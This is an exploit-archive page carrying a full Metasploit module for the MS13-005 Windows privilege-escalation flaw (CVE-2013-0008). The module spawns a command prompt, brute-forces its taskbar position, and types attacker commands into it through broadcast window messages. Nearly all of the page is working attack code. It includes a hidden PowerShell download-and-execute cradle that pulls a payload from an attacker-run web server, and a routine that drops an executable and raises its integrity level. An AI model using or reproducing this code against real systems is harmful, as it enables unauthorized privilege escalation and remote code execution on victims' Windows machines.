MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation



EKU-ID: 3396 CVE: 2013-0008 OSVDB-ID: 88966
Author: Ben Campbell Published: 2013-07-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'

class Metasploit3 < Msf::Exploit::Local
	Rank = ExcellentRanking

	include Msf::Exploit::Powershell
	include Msf::Exploit::EXE
	include Msf::Exploit::Remote::HttpServer
	include Msf::Exploit::FileDropper
	include Msf::Post::File

	def initialize(info={})
		super( update_info( info,
			'Name'		=> 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
			'Description'	=> %q{
				The Windows kernel does not properly isolate broadcast messages from low integrity
				applications from medium or high integrity applications. This allows commands to be
				broadcasted to an open medium or high integrity command prompts allowing escalation
				of privileges. We can spawn a medium integrity command prompt, after spawning a low
				integrity command prompt, by using the Win+Shift+# combination to specify the
				position of the command prompt on the taskbar. We can then broadcast our command
				and hope that the user is away and doesn't corrupt it by interacting with the UI.
				Broadcast issue affects versions  Windows Vista, 7, 8, Server 2008, Server 2008 R2,
				Server 2012, RT. But Spawning a command prompt with the shortcut key does not work
				in Vista so you will have to check if the user is already running a command prompt
				and set SPAWN_PROMPT false. The WEB technique will execute a powershell encoded
				payload from a Web location.  The FILE technique will drop an executable to the
				file system, set it to medium integrity and execute it. The TYPE technique will
				attempt to execute a powershell encoded payload directly from the command line but
				it may take some time to complete.
			},
			'License'	=> MSF_LICENSE,
			'Author'	=>
				[
					'Tavis Ormandy', # Discovery
					'Axel Souchet',  # @0vercl0k POC
					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit module
				],
			'Platform'	=> [ 'win' ],
			'SessionTypes'	=> [ 'meterpreter' ],
			'Targets'	=>
			[
				[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
				[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
			],
			'DefaultTarget' => 0,
			'DisclosureDate'=> "Nov 27 2012",
			'References' =>
				[
					[ 'CVE', '2013-0008' ],
					[ 'MSB', 'MS13-005' ],
					[ 'OSVDB', '88966'],
					[ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ]
				]
		))

		register_options(
			[
				OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
				OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
				OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])
			], self.class
		)

	end

	def low_integrity_level?
		tmp_dir = expand_path("%USERPROFILE%")
		cd(tmp_dir)
		new_dir = "#{rand_text_alpha(5)}"
		begin
			session.shell_command_token("mkdir #{new_dir}")
		rescue
			return true
		end

		if directory?(new_dir)
			session.shell_command_token("rmdir #{new_dir}")
			return false
		else
			return true
		end
	end

	def win_shift(number)
		vk = 0x30 + number
		bscan = 0x81 + number
		client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
		client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
		client.railgun.user32.keybd_event(vk, bscan, 0, 0)
		client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
		client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
		client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
	end

	def count_cmd_procs
		count = 0
		client.sys.process.each_process do |proc|
			if proc['name'] == 'cmd.exe'
				count += 1
			end
		end

		vprint_status("Cmd prompt count: #{count}")
		return count
	end

	def cleanup
		if datastore['SPAWN_PROMPT'] and @hwin
			vprint_status("Rehiding window...")
			client.railgun.user32.ShowWindow(@hwin, 0)
		end
		super
	end

	def exploit
		# First of all check if the session is running on Low Integrity Level.
		# If it isn't doesn't worth continue
		print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
		fail_with(Exploit::Failure::NotVulnerable, "Not running at Low Integrity!") unless low_integrity_level?

		# If the user prefers to drop payload to FILESYSTEM, try to cd to %TEMP% which
		# hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low
		# integrity process can write.
		drop_to_fs = false
		if datastore['TECHNIQUE'] == 'FILE'
			payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
			begin
				tmp_dir = expand_path("%TEMP%")
				tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
				cd(tmp_dir)
				print_status("Trying to drop payload to #{tmp_dir}...")
				if write_file(payload_file, generate_payload_exe)
					print_good("Payload dropped successfully, exploiting...")
					drop_to_fs = true
					register_file_for_cleanup(payload_file)
					payload_path = tmp_dir
				else
					print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
					drop_to_fs = false
				end
			rescue ::Rex::Post::Meterpreter::RequestError
				print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
				drop_to_fs = false
			end
		end

		if drop_to_fs
			command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}"
			make_it(command)
		elsif datastore['TECHNIQUE'] == 'TYPE'
			if datastore['CUSTOM_COMMAND']
				command = datastore['CUSTOM_COMMAND']
			else
				print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload")
				command = cmd_psh_payload(payload.encoded)
			end
			make_it(command)
		else
			super
		end
	end

	def primer
		url = get_uri()
		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
		command = "powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}"
		make_it(command)
	end

	def make_it(command)
		if datastore['SPAWN_PROMPT']
			@hwin = client.railgun.kernel32.GetConsoleWindow()['return']
			if @hwin == nil
				@hwin = client.railgun.user32.GetForegroundWindow()['return']
			end
			client.railgun.user32.ShowWindow(@hwin, 0)
			client.railgun.user32.ShowWindow(@hwin, 5)

			# Spawn low integrity cmd.exe
			print_status("Spawning Low Integrity Cmd Prompt")
			windir = client.fs.file.expand_path("%windir%")
			li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid

			count = count_cmd_procs
			spawned = false
			print_status("Bruteforcing Taskbar Position")
			9.downto(1) do |number|
				vprint_status("Attempting Win+Shift+#{number}")
				win_shift(number)
				sleep(1)

				if count_cmd_procs > count
					print_good("Spawned Medium Integrity Cmd Prompt")
					spawned = true
					break
				end
			end

			client.sys.process.kill(li_cmd_pid)

			fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned
		end

		print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
		command.each_char do |c|
			print c if command.length < 200
			client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
		end
		print_line
		print_status("Executing command...")
		client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
	end

	def on_request_uri(cli, request)
		print_status("Delivering Payload")
		data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
		send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
	end
end